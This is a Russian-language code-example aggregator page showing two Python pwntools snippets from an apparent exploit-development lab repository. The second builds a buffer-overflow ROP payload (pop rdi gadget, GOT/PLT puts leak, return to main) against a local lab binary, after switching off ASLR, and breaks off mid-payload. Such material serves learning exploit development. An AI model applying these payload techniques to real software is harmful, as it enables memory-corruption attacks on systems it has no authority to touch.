Python ELF.process примеры использования

Язык программирования: Python

Пространство имен/Пакет: pwn

Класс/Тип: ELF

Метод/Функция: process

Примеров на hotexamples.com: 2

Python ELF.process - 2 примера найдено. Это лучшие примеры Python кода для pwn.ELF.process, полученные из open source проектов. Вы можете ставить оценку каждому примеру, чтобы помочь нам улучшить качество примеров.

Основные методы

Показать Скрыть

ELF(30)

address(4)

process(2)

search(2)

asm(1)

disasm(1)

from_bytes(1)

get_section_by_name(1)

read(1)

save(1)

section(1)

Пример #1

Показать файл

#!/usr/bin/env python3
from pwn import process, ELF, log, context, pause
from fastpwn import pack
context(arch='amd64', os='linux', log_level='DEBUG')
binary = ELF('./lab')
p = binary.process()
offset = 112
#### define sections of the binary
# since PIE is not enabled, these will be static offsets to whichever section we want
# we will not pack them, since after they are in bytes we cannot use as decimal offsets :(
bss = 0x0804c028
plt = 0x08049030
rel_plt = 0x08048424
dynsym = 0x08048260
dynstr = 0x08048320
#### Important entries within PLT/GOT
got_read = 0x0804c010
plt_read = 0x08049050
log.info("")
log.warning("continue?")
log.info("")
pause()
log.info(".bss: \t%s" % hex(bss))
log.info(".plt: \t%s" % hex(plt))
log.info(".rel.plt: %s" % hex(rel_plt))
log.info(".dynsym:  %s" % hex(dynsym))
log.info(".dynstr:  %s" % hex(dynstr))
log.info("GOT entry to read: %s" % hex(got_read))
log.info("PLT entry to read: %s" % hex(plt_read))

stack = 0x300

Пример #2

Показать файл

Файл: exploit.py Проект: 0xmanjoos/Exploit-Development

#!/usr/bin/env python3
from pwn import ELF, process, context, log
from fastpwn import pack, aslr  # custom library :)
from sys import argv, exit
try:
    if len(argv) > 1 and argv[1] == "-l":
        if aslr.read():
            aslr.write("2")
        context(arch='amd64', os='linux', log_level='DEBUG')  # binary context
        binary = ELF("./lab")  # define our binary
        p = binary.process(env={'LD_PRELOAD': './libc.so.6'
                                })  # start our process and define enviroment

        libc = binary.libc  # name our libc object
        # we can statically find the addresses of the PLT and GOT within the binary
        # just in case you were too lazy to, here is the pwntools way to do it
        #
        # plt_puts=binary.plt['puts']
        # got_puts=binary.got['puts']
        # main_addr=binary.sym['main']

        pop_rdi = pack.pk64(0x00000000004011e3)
        got_puts = pack.pk64(0x00404018)
        plt_puts = pack.pk64(0x00401030)
        main_addr = pack.pk64(0x00401136)
        offset = 40
        leak_payload = b"A" * offset  # overwrite ret addr, main ret back to gadget
        leak_payload += pop_rdi  # next we use a gadget, rdi will be the first parameter
        leak_payload += got_puts  # pass the address of the puts() entry on the global offset table
        leak_payload += plt_puts  # then, call puts(), this will actuall call puts
        leak_payload += main_addr  # ret back to main, since we still want to overwrite the buffer again